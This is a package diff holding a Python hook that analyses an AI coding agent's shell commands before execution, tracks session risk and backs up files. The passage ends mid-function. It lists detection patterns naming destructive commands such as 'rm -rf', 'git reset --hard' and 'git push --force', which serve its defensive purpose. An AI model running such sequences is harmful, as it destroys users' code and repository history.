deliberate 1.0.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -0,0 +1,1742 @@
+ #!/usr/bin/env python3
+ # -*- coding: utf-8 -*-
+ """
+ Deliberate - Command Analysis Hook
+
+ PreToolUse hook that explains what shell commands will do before execution.
+ Multi-layer architecture for robust classification:
+
+ Layer 1: Pattern matching + ML model (fast, immune to prompt injection)
+ Layer 2: LLM explanation (natural language, configurable provider)
+
+ https://github.com/the-radar/deliberate
+ """
+
+ import json
+ import sys
+ import os
+ import urllib.request
+ import urllib.error
+ from pathlib import Path
+
+ # Configuration
+ CLASSIFIER_URL = "http://localhost:8765/classify/command"
+
+ # Support both plugin mode (CLAUDE_PLUGIN_ROOT) and npm install mode (~/.deliberate/)
+ # Plugin mode: config in plugin directory
+ # npm mode: config in ~/.deliberate/
+ PLUGIN_ROOT = os.environ.get('CLAUDE_PLUGIN_ROOT')
+ if PLUGIN_ROOT:
+     CONFIG_FILE = str(Path(PLUGIN_ROOT) / ".deliberate" / "config.json")
+ else:
+     CONFIG_FILE = str(Path.home() / ".deliberate" / "config.json")
+
+ TIMEOUT_SECONDS = 30
+ CLASSIFIER_TIMEOUT = 5  # Classifier should be fast
+ DEBUG = False
+ USE_CLASSIFIER = True  # Try classifier first if available
+
+ # Session state for deduplication
+ import hashlib
+ import random
+ from datetime import datetime
+
+
+ def get_state_file(session_id: str) -> str:
+     """Get session-specific state file path."""
+     return os.path.expanduser(f"~/.claude/deliberate_cmd_state_{session_id}.json")
+
+
+ def get_history_file(session_id: str) -> str:
+     """Get session-specific command history file path."""
+     return os.path.expanduser(f"~/.claude/deliberate_cmd_history_{session_id}.json")
+
+
+ def cleanup_old_state_files():
+     """Remove state and history files older than 7 days (runs 10% of the time)."""
+     if random.random() > 0.1:
+         return
+     try:
+         state_dir = os.path.expanduser("~/.claude")
+         if not os.path.exists(state_dir):
+             return
+         current_time = datetime.now().timestamp()
+         seven_days_ago = current_time - (7 * 24 * 60 * 60)
+         for filename in os.listdir(state_dir):
+             # Clean up state files, history files, and cache files
+             if filename.startswith("deliberate_") and filename.endswith(".json"):
+                 file_path = os.path.join(state_dir, filename)
+                 try:
+                     if os.path.getmtime(file_path) < seven_days_ago:
+                         os.remove(file_path)
+                 except (OSError, IOError):
+                     pass
+     except Exception:
+         pass
+
+
+ def load_state(session_id: str) -> set:
+     """Load the set of already-shown warning keys for this session."""
+     state_file = get_state_file(session_id)
+     if os.path.exists(state_file):
+         try:
+             with open(state_file, 'r') as f:
+                 return set(json.load(f))
+         except (json.JSONDecodeError, IOError):
+             return set()
+     return set()
+
+
+ # Workflow patterns that indicate dangerous sequences
+ # Format: (pattern_name, required_commands, risk_level, description)
+ WORKFLOW_PATTERNS = [
+     ("REPO_WIPE", ["git rm", "git push --force"], "CRITICAL",
+      "Repository wipe: removing files from git and force pushing rewrites history permanently"),
+     ("REPO_WIPE", ["rm -rf", "git add", "git push --force"], "CRITICAL",
+      "Repository restructure with force push: deleting files and force pushing can destroy code"),
+     ("MASS_DELETE", ["rm -rf", "rm -rf", "rm -rf"], "HIGH",
+      "Multiple recursive deletions in sequence - high risk of unintended data loss"),
+     ("HISTORY_REWRITE", ["git reset --hard", "git push --force"], "CRITICAL",
+      "History rewrite: hard reset + force push permanently destroys commit history"),
+     ("HISTORY_REWRITE", ["git rebase", "git push --force"], "CRITICAL",
+      "History rewrite: rebase + force push rewrites shared history"),
+     ("UNCOMMITTED_RISK", ["git stash", "git checkout", "rm"], "HIGH",
+      "Uncommitted changes at risk: stashing, switching branches, and deleting files"),
+     ("TEMP_SWAP", ["cp", "rm -rf", "cp"], "HIGH",
+      "Temp directory swap pattern: copying to temp, deleting original, copying back - easy to lose data"),
+     ("ENV_DESTRUCTION", ["unset", "rm .env"], "HIGH",
+      "Environment destruction: unsetting variables and deleting env files"),
+ ]
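+
+ # How a pattern reads (illustrative note, not part of the original source):
+ # ["git rm", "git push --force"] means a command containing "git rm" followed
+ # later, in order and by case-insensitive substring match, by one containing
+ # "git push --force", within the sliding window checked by
+ # detect_workflow_patterns() below.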
+
+
+ def load_command_history(session_id: str) -> dict:
+     """Load command history for this session.
+
+     Returns dict with:
+     - commands: list of {command, risk, timestamp, explanation}
+     - cumulative_risk: current session risk level
+     - patterns_detected: list of detected workflow patterns
+     - files_at_risk: list of files that could be affected
+     """
+     history_file = get_history_file(session_id)
+     default_history = {
+         "commands": [],
+         "cumulative_risk": "LOW",
+         "patterns_detected": [],
+         "files_at_risk": []
+     }
+
+     if os.path.exists(history_file):
+         try:
+             with open(history_file, 'r') as f:
+                 history = json.load(f)
+             # Ensure all keys exist
+             for key in default_history:
+                 if key not in history:
+                     history[key] = default_history[key]
+             return history
+         except (json.JSONDecodeError, IOError):
+             return default_history
+     return default_history
+
+
+ def save_command_history(session_id: str, history: dict):
+     """Save command history for this session."""
+     history_file = get_history_file(session_id)
+     try:
+         os.makedirs(os.path.dirname(history_file), exist_ok=True)
+         with open(history_file, 'w') as f:
+             json.dump(history, f, indent=2)
+     except IOError:
+         pass
+
+
+ def extract_affected_paths(command: str) -> list:
+     """Extract file/directory paths that could be affected by a command.
+
+     Looks for paths in common destructive commands like rm, mv, cp, git rm, etc.
+     """
+     import re
+     paths = []
+
+     # Patterns for extracting paths from various commands
+     # rm -rf /path or rm -rf path
+     rm_match = re.findall(r'rm\s+(?:-[rfivd]+\s+)*([^\s|;&>]+)', command)
+     paths.extend(rm_match)
+
+     # git rm -rf path
+     git_rm_match = re.findall(r'git\s+rm\s+(?:-[rf]+\s+)*([^\s|;&>]+)', command)
+     paths.extend(git_rm_match)
+
+     # mv source dest - source is at risk
+     mv_match = re.findall(r'mv\s+(?:-[fiv]+\s+)*([^\s|;&>]+)\s+', command)
+     paths.extend(mv_match)
+
+     # Filter out flags and special chars
+     paths = [p for p in paths if not p.startswith('-') and p not in ['.', '..', '/']]
+
+     return paths
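+
+ # Traced example (illustrative sketch; hypothetical paths):
+ #   >>> extract_affected_paths("rm -rf build/ && mv src.bak src")
+ #   ['build/', 'src.bak']
+ # Note that each regex captures only the first argument of its rm/mv invocation.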
+
+
+ def detect_workflow_patterns(history: dict, current_command: str, window_size: int = 3) -> list:
+     """Detect dangerous workflow patterns from recent command history + current command.
+
+     Uses a sliding window to only look at the last N commands, avoiding stale pattern
+     matches from old commands that are no longer relevant to the current context.
+
+     Args:
+         history: Command history dict with "commands" list
+         current_command: The command being analyzed
+         window_size: Number of recent commands to consider (default 3)
+
+     Returns list of (pattern_name, risk_level, description) for detected patterns.
+     """
+     detected = []
+
+     # Only look at the last N commands (sliding window)
+     all_history_commands = [cmd["command"] for cmd in history.get("commands", [])]
+     recent_commands = all_history_commands[-window_size:] if all_history_commands else []
+     recent_commands.append(current_command)
+
+     # Check each workflow pattern against recent commands only
+     for pattern_name, required_cmds, risk_level, description in WORKFLOW_PATTERNS:
+         # Check if all required command patterns appear in sequence within the window
+         found_all = True
+         last_idx = -1
+
+         for required in required_cmds:
+             found_this = False
+             for idx, cmd in enumerate(recent_commands):
+                 if idx > last_idx and required.lower() in cmd.lower():
+                     found_this = True
+                     last_idx = idx
+                     break
+
+             if not found_this:
+                 found_all = False
+                 break
+
+         if found_all:
+             detected.append((pattern_name, risk_level, description))
+
+     return detected
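+
+ # Usage sketch (doctest-style illustration; commands hypothetical):
+ #   >>> hist = {"commands": [{"command": "git reset --hard HEAD~1"}]}
+ #   >>> detect_workflow_patterns(hist, "git push --force origin main")
+ #   [('HISTORY_REWRITE', 'CRITICAL', 'History rewrite: hard reset + force push permanently destroys commit history')]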
+
+
+ def calculate_cumulative_risk(history: dict, current_risk: str) -> str:
+     """Calculate cumulative session risk based on history and current command.
+
+     Risk escalates based on:
+     - Number of DANGEROUS commands
+     - Detected workflow patterns
+     - Files at risk
+     """
+     risk_levels = {"LOW": 0, "MODERATE": 1, "HIGH": 2, "CRITICAL": 3}
+
+     # Start with current command's risk
+     max_risk = risk_levels.get(current_risk, 1)
+
+     # Check historical risks
+     dangerous_count = 0
+     for cmd in history.get("commands", []):
+         cmd_risk = cmd.get("risk", "MODERATE")
+         if cmd_risk == "DANGEROUS":
+             dangerous_count += 1
+         max_risk = max(max_risk, risk_levels.get(cmd_risk, 1))
+
+     # Escalate based on dangerous command count
+     if dangerous_count >= 3:
+         max_risk = max(max_risk, risk_levels["HIGH"])
+     if dangerous_count >= 5:
+         max_risk = max(max_risk, risk_levels["CRITICAL"])
+
+     # Check for detected patterns
+     for pattern in history.get("patterns_detected", []):
+         pattern_risk = pattern[1] if len(pattern) > 1 else "HIGH"
+         max_risk = max(max_risk, risk_levels.get(pattern_risk, 2))
+
+     # Convert back to string
+     for name, level in risk_levels.items():
+         if level == max_risk:
+             return name
+
+     return "MODERATE"
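+
+ # Worked example (illustrative): three DANGEROUS commands in history plus a
+ # MODERATE current command. "DANGEROUS" is not a key in risk_levels, so each
+ # per-command lookup falls back to 1 (MODERATE); the count rule then escalates:
+ #   dangerous_count = 3  ->  max_risk = max(1, risk_levels["HIGH"]) = 2  ->  "HIGH"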
+
+
+ def get_destruction_consequences(command: str, cwd: str = ".") -> dict | None:
+     """Analyze what a destructive command will actually delete/modify.
+
+     Returns dict with:
+     - files: list of files that will be affected
+     - dirs: list of directories that will be affected
+     - total_lines: estimated lines of code at risk
+     - total_size: total size in bytes
+     - warning: human-readable consequence summary
+     - type: the type of destruction (rm, git_reset, git_clean, etc.)
+
+     Returns None if command is not destructive or paths don't exist.
+     """
+     import re
+     import subprocess
+
+     consequences = {
+         "files": [],
+         "dirs": [],
+         "total_lines": 0,
+         "total_size": 0,
+         "warning": "",
+         "type": None
+     }
+
+     # Check for git reset --hard (discards uncommitted changes)
+     if re.search(r'git\s+reset\s+--hard', command):
+         return _analyze_git_reset_hard(cwd, consequences)
+
+     # Check for git clean (removes untracked files)
+     if re.search(r'git\s+clean', command):
+         return _analyze_git_clean(cwd, consequences)
+
+     # Check for git checkout -- (discards uncommitted changes to tracked files)
+     if re.search(r'git\s+checkout\s+--', command) or re.search(r'git\s+checkout\s+\.\s*$', command):
+         return _analyze_git_checkout_discard(cwd, consequences)
+
+     # Check for git stash drop (permanently deletes stashed changes)
+     if re.search(r'git\s+stash\s+drop', command):
+         return _analyze_git_stash_drop(cwd, command, consequences)
+
+     # Detect rm commands and extract targets
+     rm_pattern = r'rm\s+(?:-[rfivd]+\s+)*(.+?)(?:\s*[|;&>]|$)'
+     rm_match = re.search(rm_pattern, command)
+
+     # Detect git rm commands
+     git_rm_pattern = r'git\s+rm\s+(?:-[rf]+\s+)*(.+?)(?:\s*[|;&>]|$)'
+     git_rm_match = re.search(git_rm_pattern, command)
+
+     targets = []
+     if rm_match:
+         # Split by spaces but respect quotes
+         target_str = rm_match.group(1).strip()
+         targets = target_str.split()
+         consequences["type"] = "rm"
+     elif git_rm_match:
+         target_str = git_rm_match.group(1).strip()
+         targets = target_str.split()
+         consequences["type"] = "git_rm"
+
+     if not targets:
+         return None
+
+     # Analyze each target
+     for target in targets:
+         if target.startswith('-'):
+             continue  # Skip flags
+
+         # Expand path relative to cwd
+         if not os.path.isabs(target):
+             target = os.path.join(cwd, target)
+         target = os.path.expanduser(target)
+
+         # Handle glob patterns
+         if '*' in target or '?' in target:
+             import glob
+             expanded = glob.glob(target, recursive=True)
+             for path in expanded:
+                 _analyze_path(path, consequences)
+         elif os.path.exists(target):
+             _analyze_path(target, consequences)
+
+     # Generate warning message
+     if consequences["files"] or consequences["dirs"]:
+         file_count = len(consequences["files"])
+         dir_count = len(consequences["dirs"])
+         lines = consequences["total_lines"]
+         size_kb = consequences["total_size"] / 1024
+
+         parts = []
+         if file_count:
+             parts.append(f"{file_count} file{'s' if file_count > 1 else ''}")
+         if dir_count:
+             parts.append(f"{dir_count} director{'ies' if dir_count > 1 else 'y'}")
+
+         consequences["warning"] = f"⚠️ WILL DELETE: {', '.join(parts)}"
+         if lines > 0:
+             consequences["warning"] += f" ({lines:,} lines of code)"
+         if size_kb > 1:
+             consequences["warning"] += f" [{size_kb:.1f} KB]"
+
+         # Show preview of what will be deleted
+         preview_files = consequences["files"][:10]
+         if preview_files:
+             consequences["warning"] += "\n Files:"
+             for f in preview_files:
+                 consequences["warning"] += f"\n - {f}"
+             if len(consequences["files"]) > 10:
+                 consequences["warning"] += f"\n ... and {len(consequences['files']) - 10} more"
+
+         return consequences
+
+     return None
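+
+ # Shape of a non-None return value (illustrative sketch; values hypothetical):
+ #   {
+ #       "type": "rm",
+ #       "files": ["/work/app/src/main.py", "..."],
+ #       "dirs": ["/work/app/src"],
+ #       "total_lines": 1240,
+ #       "total_size": 48231,
+ #       "warning": "⚠️ WILL DELETE: 12 files, 1 directory (1,240 lines of code) [47.1 KB]..."
+ #   }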
+
+
+ def _analyze_path(path: str, consequences: dict):
+     """Helper to analyze a single path and add to consequences."""
+     try:
+         if os.path.isfile(path):
+             consequences["files"].append(path)
+             size = os.path.getsize(path)
+             consequences["total_size"] += size
+
+             # Count lines for text files
+             if _is_text_file(path):
+                 try:
+                     with open(path, 'r', encoding='utf-8', errors='ignore') as f:
+                         lines = sum(1 for _ in f)
+                     consequences["total_lines"] += lines
+                 except (IOError, PermissionError):
+                     pass
+
+         elif os.path.isdir(path):
+             consequences["dirs"].append(path)
+             # Walk directory to count contents
+             for root, _dirs, files in os.walk(path):
+                 for filename in files:
+                     filepath = os.path.join(root, filename)
+                     try:
+                         consequences["files"].append(filepath)
+                         size = os.path.getsize(filepath)
+                         consequences["total_size"] += size
+
+                         if _is_text_file(filepath):
+                             with open(filepath, 'r', encoding='utf-8', errors='ignore') as f:
+                                 lines = sum(1 for _ in f)
+                             consequences["total_lines"] += lines
+                     except (IOError, PermissionError, OSError):
+                         pass
+     except (OSError, PermissionError):
+         pass
+
+
+ def _analyze_git_reset_hard(cwd: str, consequences: dict) -> dict | None:
+     """Analyze what git reset --hard will discard.
+
+     Runs git diff HEAD to see uncommitted changes that will be lost.
+     """
+     import subprocess
+
+     consequences["type"] = "git_reset_hard"
+
+     try:
+         # Get list of modified files
+         status_result = subprocess.run(
+             ["git", "status", "--porcelain"],
+             capture_output=True, text=True, timeout=10, cwd=cwd
+         )
+
+         if status_result.returncode != 0:
+             return None  # Not a git repo
+
+         if not status_result.stdout.strip():
+             return None  # No uncommitted changes, reset is safe
+
+         # Parse modified files
+         for line in status_result.stdout.strip().split('\n'):
+             if len(line) >= 3:
+                 status = line[:2]
+                 filepath = line[3:].strip()
+
+                 # Handle renamed files (R old -> new)
+                 if ' -> ' in filepath:
+                     filepath = filepath.split(' -> ')[1]
+
+                 full_path = os.path.join(cwd, filepath)
+
+                 # M = modified, A = added, D = deleted, ? = untracked
+                 if status[0] in 'MA' or status[1] in 'MA':
+                     consequences["files"].append(filepath)
+                     if os.path.exists(full_path):
+                         try:
+                             size = os.path.getsize(full_path)
+                             consequences["total_size"] += size
+                             if _is_text_file(full_path):
+                                 with open(full_path, 'r', encoding='utf-8', errors='ignore') as f:
+                                     lines = sum(1 for _ in f)
+                                 consequences["total_lines"] += lines
+                         except (IOError, OSError):
+                             pass
+
+         # Get actual diff to show what changes will be lost
+         diff_result = subprocess.run(
+             ["git", "diff", "HEAD", "--stat"],
+             capture_output=True, text=True, timeout=10, cwd=cwd
+         )
+
+         if not consequences["files"]:
+             return None
+
+         # Build warning message
+         file_count = len(consequences["files"])
+         lines = consequences["total_lines"]
+
+         consequences["warning"] = f"⚠️ UNCOMMITTED CHANGES WILL BE DISCARDED: {file_count} file{'s' if file_count > 1 else ''}"
+         if lines > 0:
+             consequences["warning"] += f" ({lines:,} lines of changes)"
+
+         consequences["warning"] += "\n Modified files:"
+         for f in consequences["files"][:10]:
+             consequences["warning"] += f"\n - {f}"
+         if len(consequences["files"]) > 10:
+             consequences["warning"] += f"\n ... and {len(consequences['files']) - 10} more"
+
+         if diff_result.stdout:
+             # Add the stat summary
+             stat_lines = diff_result.stdout.strip().split('\n')
+             if stat_lines:
+                 consequences["warning"] += f"\n\n {stat_lines[-1]}"  # Summary line like "5 files changed, 120 insertions(+), 30 deletions(-)"
+
+         return consequences
+
+     except (subprocess.TimeoutExpired, FileNotFoundError, OSError):
+         return None
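+
+ # Sample `git status --porcelain` lines and how the parser above treats them
+ # (illustrative; filenames hypothetical):
+ #   " M src/app.py"        -> status " M": worktree-modified, counted
+ #   "A  new_module.py"     -> status "A ": staged addition, counted
+ #   "R  old.py -> new.py"  -> rename; only the new path ("new.py") is recorded
+ #   "?? scratch.txt"       -> untracked; neither column is in 'MA', skipped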
+
+
+ def _analyze_git_clean(cwd: str, consequences: dict) -> dict | None:
+     """Analyze what git clean will remove.
+
+     Runs git clean -n (dry run) to preview what would be deleted.
+     """
+     import subprocess
+
+     consequences["type"] = "git_clean"
+
+     try:
+         # Dry run to see what would be removed
+         # -d includes directories, -f is required, -n is dry run
+         clean_result = subprocess.run(
+             ["git", "clean", "-dfn"],
+             capture_output=True, text=True, timeout=10, cwd=cwd
+         )
+
+         if clean_result.returncode != 0:
+             return None
+
+         if not clean_result.stdout.strip():
+             return None  # Nothing to clean
+
+         # Parse output: "Would remove path/to/file"
+         for line in clean_result.stdout.strip().split('\n'):
+             if line.startswith("Would remove "):
+                 filepath = line[len("Would remove "):].strip()
+                 full_path = os.path.join(cwd, filepath)
+
+                 if os.path.isdir(full_path):
+                     consequences["dirs"].append(filepath)
+                     # Count files in directory
+                     for root, _dirs, files in os.walk(full_path):
+                         for filename in files:
+                             fpath = os.path.join(root, filename)
+                             consequences["files"].append(fpath)
+                             try:
+                                 consequences["total_size"] += os.path.getsize(fpath)
+                                 if _is_text_file(fpath):
+                                     with open(fpath, 'r', encoding='utf-8', errors='ignore') as f:
+                                         consequences["total_lines"] += sum(1 for _ in f)
+                             except (IOError, OSError):
+                                 pass
+                 else:
+                     consequences["files"].append(filepath)
+                     if os.path.exists(full_path):
+                         try:
+                             consequences["total_size"] += os.path.getsize(full_path)
+                             if _is_text_file(full_path):
+                                 with open(full_path, 'r', encoding='utf-8', errors='ignore') as f:
+                                     consequences["total_lines"] += sum(1 for _ in f)
+                         except (IOError, OSError):
+                             pass
+
+         if not consequences["files"] and not consequences["dirs"]:
+             return None
+
+         # Build warning
+         file_count = len(consequences["files"])
+         dir_count = len(consequences["dirs"])
+         lines = consequences["total_lines"]
+
+         consequences["warning"] = f"⚠️ UNTRACKED FILES WILL BE DELETED: {file_count} file{'s' if file_count != 1 else ''}"
+         if dir_count:
+             consequences["warning"] += f", {dir_count} director{'ies' if dir_count != 1 else 'y'}"
+         if lines > 0:
+             consequences["warning"] += f" ({lines:,} lines)"
+
+         consequences["warning"] += "\n Will remove:"
+         for f in consequences["files"][:10]:
+             consequences["warning"] += f"\n - {f}"
+         if len(consequences["files"]) > 10:
+             consequences["warning"] += f"\n ... and {len(consequences['files']) - 10} more"
+
+         return consequences
+
+     except (subprocess.TimeoutExpired, FileNotFoundError, OSError):
+         return None
+
+
+ def _analyze_git_checkout_discard(cwd: str, consequences: dict) -> dict | None:
+     """Analyze what git checkout -- will discard.
+
+     Shows modified tracked files that will lose their changes.
+     """
+     import subprocess
+
+     consequences["type"] = "git_checkout_discard"
+
+     try:
+         # Get modified files (not staged)
+         diff_result = subprocess.run(
+             ["git", "diff", "--name-only"],
+             capture_output=True, text=True, timeout=10, cwd=cwd
+         )
+
+         if diff_result.returncode != 0:
+             return None
+
+         if not diff_result.stdout.strip():
+             return None  # No modifications to discard
+
+         for filepath in diff_result.stdout.strip().split('\n'):
+             filepath = filepath.strip()
+             if not filepath:
+                 continue
+
+             consequences["files"].append(filepath)
+             full_path = os.path.join(cwd, filepath)
+
+             if os.path.exists(full_path):
+                 try:
+                     consequences["total_size"] += os.path.getsize(full_path)
+                     if _is_text_file(full_path):
+                         with open(full_path, 'r', encoding='utf-8', errors='ignore') as f:
+                             consequences["total_lines"] += sum(1 for _ in f)
+                 except (IOError, OSError):
+                     pass
+
+         if not consequences["files"]:
+             return None
+
+         # Get diff stat for summary
+         stat_result = subprocess.run(
+             ["git", "diff", "--stat"],
+             capture_output=True, text=True, timeout=10, cwd=cwd
+         )
+
+         file_count = len(consequences["files"])
+         consequences["warning"] = f"⚠️ UNCOMMITTED CHANGES WILL BE DISCARDED: {file_count} file{'s' if file_count != 1 else ''}"
+
+         consequences["warning"] += "\n Modified files:"
+         for f in consequences["files"][:10]:
+             consequences["warning"] += f"\n - {f}"
+         if len(consequences["files"]) > 10:
+             consequences["warning"] += f"\n ... and {len(consequences['files']) - 10} more"
+
+         if stat_result.stdout:
+             stat_lines = stat_result.stdout.strip().split('\n')
+             if stat_lines:
+                 consequences["warning"] += f"\n\n {stat_lines[-1]}"
+
+         return consequences
+
+     except (subprocess.TimeoutExpired, FileNotFoundError, OSError):
+         return None
+
+
+ def _analyze_git_stash_drop(cwd: str, command: str, consequences: dict) -> dict | None:
+     """Analyze what git stash drop will permanently delete.
+
+     Shows the content of the stash being dropped.
+     """
+     import subprocess
+     import re
+
+     consequences["type"] = "git_stash_drop"
+
+     try:
+         # Parse which stash is being dropped (default is stash@{0})
+         stash_ref = "stash@{0}"
+         match = re.search(r'stash@\{(\d+)\}', command)
+         if match:
+             stash_ref = f"stash@{{{match.group(1)}}}"
+
+         # Get stash info
+         show_result = subprocess.run(
+             ["git", "stash", "show", "--stat", stash_ref],
+             capture_output=True, text=True, timeout=10, cwd=cwd
+         )
+
+         if show_result.returncode != 0:
+             return None  # Stash doesn't exist
+
+         # Parse files from stash show output
+         for line in show_result.stdout.strip().split('\n'):
+             # Lines look like: " file.txt | 10 +++---"
+             if '|' in line:
+                 filepath = line.split('|')[0].strip()
+                 if filepath:
+                     consequences["files"].append(filepath)
+
+         if not consequences["files"]:
+             return None
+
+         file_count = len(consequences["files"])
+         consequences["warning"] = f"⚠️ STASH WILL BE PERMANENTLY DELETED: {stash_ref} ({file_count} file{'s' if file_count != 1 else ''})"
+
+         consequences["warning"] += "\n Stashed changes:"
+         for f in consequences["files"][:10]:
+             consequences["warning"] += f"\n - {f}"
+         if len(consequences["files"]) > 10:
+             consequences["warning"] += f"\n ... and {len(consequences['files']) - 10} more"
+
+         # Add the stat summary
+         stat_lines = show_result.stdout.strip().split('\n')
+         if stat_lines:
+             consequences["warning"] += f"\n\n {stat_lines[-1]}"
+
+         return consequences
+
+     except (subprocess.TimeoutExpired, FileNotFoundError, OSError):
+         return None
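+
+ # Sample `git stash show --stat` output the parser above consumes
+ # (illustrative; filenames and counts hypothetical):
+ #    src/app.py | 42 ++++++----
+ #    README.md  |  3 +-
+ #    2 files changed, 30 insertions(+), 15 deletions(-)
+ # Lines containing '|' yield file paths; the trailing summary line becomes the
+ # stat footer appended to the warning.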
+
+
+ def _is_text_file(path: str) -> bool:
+     """Check if file is likely a text/code file based on extension."""
+     text_extensions = {
+         '.py', '.js', '.ts', '.tsx', '.jsx', '.json', '.yaml', '.yml',
+         '.md', '.txt', '.sh', '.bash', '.zsh', '.fish',
+         '.html', '.css', '.scss', '.sass', '.less',
+         '.java', '.kt', '.scala', '.go', '.rs', '.rb', '.php',
+         '.c', '.cpp', '.h', '.hpp', '.cs', '.swift', '.m',
+         '.sql', '.graphql', '.proto', '.xml', '.toml', '.ini', '.cfg',
+         '.env', '.gitignore', '.dockerignore', 'Makefile', 'Dockerfile',
+         '.vue', '.svelte', '.astro'
+     }
+     _, ext = os.path.splitext(path)
+     return ext.lower() in text_extensions or os.path.basename(path) in text_extensions
+
+
+ def get_backup_dir() -> str:
+     """Get the Deliberate backup directory."""
+     return os.path.expanduser("~/.deliberate/backups")
+
+
+ def create_pre_destruction_backup(
+     session_id: str,
+     command: str,
+     cwd: str,
+     consequences: dict | None,
+     history: dict | None
+ ) -> str | None:
+     """Create automatic backup before CRITICAL operations.
+
+     Backs up:
+     - Files that will be affected (if consequences provided)
+     - Current git state (branch, uncommitted changes)
+     - Session command history (for context)
+
+     Returns backup path if successful, None if backup failed/skipped.
+     """
+     import shutil
+     import subprocess
+
+     backup_base = get_backup_dir()
+     timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
+
+     # Create project-specific backup dir
+     project_name = os.path.basename(cwd) or "unknown"
+     backup_dir = os.path.join(backup_base, project_name, timestamp)
+
+     try:
+         os.makedirs(backup_dir, exist_ok=True)
+
+         # 1. Track file mappings for restore
+         file_mappings = []  # {"original": absolute path, "backup": relative path in backup}
+
+         # 2. Backup files at risk (if we have them)
+         if consequences and consequences.get("files"):
+             files_dir = os.path.join(backup_dir, "files")
+             os.makedirs(files_dir, exist_ok=True)
+
+             backed_up = 0
+             for filepath in consequences["files"][:100]:  # Limit to 100 files
+                 # Resolve to absolute path
+                 if os.path.isabs(filepath):
+                     abs_path = filepath
+                 else:
+                     abs_path = os.path.join(cwd, filepath)
+
+                 if os.path.exists(abs_path) and os.path.isfile(abs_path):
+                     try:
+                         # Preserve directory structure relative to cwd
+                         rel_path = os.path.relpath(abs_path, cwd)
+                         dest_path = os.path.join(files_dir, rel_path)
+                         os.makedirs(os.path.dirname(dest_path), exist_ok=True)
+                         shutil.copy2(abs_path, dest_path)
+
+                         # Track mapping for restore
+                         file_mappings.append({
+                             "original": abs_path,
+                             "backup": os.path.join("files", rel_path)
+                         })
+                         backed_up += 1
+                     except (IOError, OSError, shutil.Error):
+                         pass
+
+             debug(f"Backed up {backed_up} files to {files_dir}")
+
+         # 3. Save metadata with file mappings for restore
+         metadata = {
+             "timestamp": datetime.now().isoformat(),
+             "session_id": session_id,
+             "command": command,
+             "cwd": cwd,
+             "consequences": consequences,
+             "history": history,
+             "file_mappings": file_mappings,  # For restore: original path -> backup path
+             "version": "2.0"  # Metadata format version
+         }
+         with open(os.path.join(backup_dir, "metadata.json"), 'w') as f:
+             json.dump(metadata, f, indent=2)
+
+         # 4. Capture git state if in a repo
+         git_dir = os.path.join(backup_dir, "git_state")
+         os.makedirs(git_dir, exist_ok=True)
+
+         try:
+             # Get current branch
+             branch_result = subprocess.run(
+                 ["git", "rev-parse", "--abbrev-ref", "HEAD"],
+                 capture_output=True, text=True, timeout=5, cwd=cwd
+             )
+             if branch_result.returncode == 0:
+                 with open(os.path.join(git_dir, "branch.txt"), 'w') as f:
+                     f.write(branch_result.stdout.strip())
+
+             # Get current commit
+             commit_result = subprocess.run(
+                 ["git", "rev-parse", "HEAD"],
+                 capture_output=True, text=True, timeout=5, cwd=cwd
+             )
+             if commit_result.returncode == 0:
+                 with open(os.path.join(git_dir, "commit.txt"), 'w') as f:
+                     f.write(commit_result.stdout.strip())
+
+             # Get status
+             status_result = subprocess.run(
+                 ["git", "status", "--porcelain"],
+                 capture_output=True, text=True, timeout=10, cwd=cwd
+             )
+             if status_result.returncode == 0:
+                 with open(os.path.join(git_dir, "status.txt"), 'w') as f:
+                     f.write(status_result.stdout)
+
+             # Get diff of uncommitted changes
+             diff_result = subprocess.run(
+                 ["git", "diff", "HEAD"],
+                 capture_output=True, text=True, timeout=30, cwd=cwd
+             )
+             if diff_result.returncode == 0 and diff_result.stdout:
+                 with open(os.path.join(git_dir, "uncommitted.diff"), 'w') as f:
+                     f.write(diff_result.stdout)
+
+         except (subprocess.TimeoutExpired, FileNotFoundError):
+             debug("Git state capture skipped (not a git repo or git unavailable)")
+
+         debug(f"Created backup at {backup_dir}")
+         return backup_dir
+
+     except Exception as e:
+         debug(f"Backup failed: {e}")
+         return None
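+
+ # Resulting backup layout (illustrative sketch; <project> and timestamp vary):
+ #   ~/.deliberate/backups/<project>/<YYYYMMDD_HHMMSS>/
+ #       metadata.json     command, cwd, consequences, history, file_mappings
+ #       files/...         copies of up to 100 at-risk files (paths relative to cwd)
+ #       git_state/        branch.txt, commit.txt, status.txt, uncommitted.diff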
+
+
+ def load_backup_config() -> dict:
+     """Load backup configuration from config file."""
+     try:
+         config_path = Path(CONFIG_FILE)
+         if config_path.exists():
+             with open(config_path, 'r', encoding='utf-8') as f:
+                 config = json.load(f)
+             backup = config.get("backup", {})
+             return {
+                 "enabled": backup.get("enabled", True),  # Enabled by default
+                 "maxBackups": backup.get("maxBackups", 50),
+                 "riskThreshold": backup.get("riskThreshold", "CRITICAL")  # Only backup for CRITICAL by default
+             }
+     except Exception:
+         pass
+     return {"enabled": True, "maxBackups": 50, "riskThreshold": "CRITICAL"}
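+
+ # Keys this hook reads from config.json, gathered from the load_* helpers in
+ # this file (illustrative sketch; every value below is an example, not a
+ # recommendation):
+ #   {
+ #       "backup":        {"enabled": true, "maxBackups": 50, "riskThreshold": "CRITICAL"},
+ #       "blocking":      {"enabled": false, "confidenceThreshold": 0.85},
+ #       "deduplication": {"enabled": true},
+ #       "skipCommands":  {"additional": ["make test"], "remove": ["tree"]},
+ #       "llm":           {"provider": "claude-subscription", "model": "<model-id>",
+ #                         "baseUrl": null, "apiKey": null}
+ #   }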
+
+
+ def add_command_to_history(session_id: str, command: str, risk: str, explanation: str):
+     """Add a command to session history and update cumulative analysis."""
+     history = load_command_history(session_id)
+
+     # Add command entry
+     history["commands"].append({
+         "command": command[:500],  # Truncate long commands
+         "risk": risk,
+         "explanation": explanation[:200] if explanation else "",
+         "timestamp": datetime.now().isoformat()
+     })
+
+     # Keep only last 50 commands to prevent unbounded growth
+     if len(history["commands"]) > 50:
+         history["commands"] = history["commands"][-50:]
+
+     # Detect workflow patterns
+     patterns = detect_workflow_patterns(history, command)
+     if patterns:
+         for pattern in patterns:
+             if pattern not in history["patterns_detected"]:
+                 history["patterns_detected"].append(pattern)
+
+     # Update cumulative risk
+     history["cumulative_risk"] = calculate_cumulative_risk(history, risk)
+
+     # Track files at risk
+     affected_paths = extract_affected_paths(command)
+     for path in affected_paths:
+         if path not in history["files_at_risk"]:
